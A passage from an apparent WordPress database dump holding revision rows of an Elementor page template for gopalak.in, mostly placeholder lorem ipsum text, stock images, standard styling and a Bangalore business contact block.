src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:46:13','2022-09-30 06:16:13','',1373,'https://gopalak.in/?p=1488',0,'revision','',0),(1490,1,'2022-09-30 12:00:10','2022-09-30 06:30:10','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:00:10','2022-09-30 06:30:10','',1373,'https://gopalak.in/?p=1490',0,'revision','',0),(1491,1,'2022-09-30 12:00:10','2022-09-30 06:30:10','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:00:10','2022-09-30 06:30:10','',1373,'https://gopalak.in/?p=1491',0,'revision','',0),(1492,1,'2022-09-30 12:00:10','2022-09-30 06:30:10','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:00:10','2022-09-30 06:30:10','',1373,'https://gopalak.in/?p=1492',0,'revision','',0),(1494,1,'2022-09-30 12:08:19','2022-09-30 06:38:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 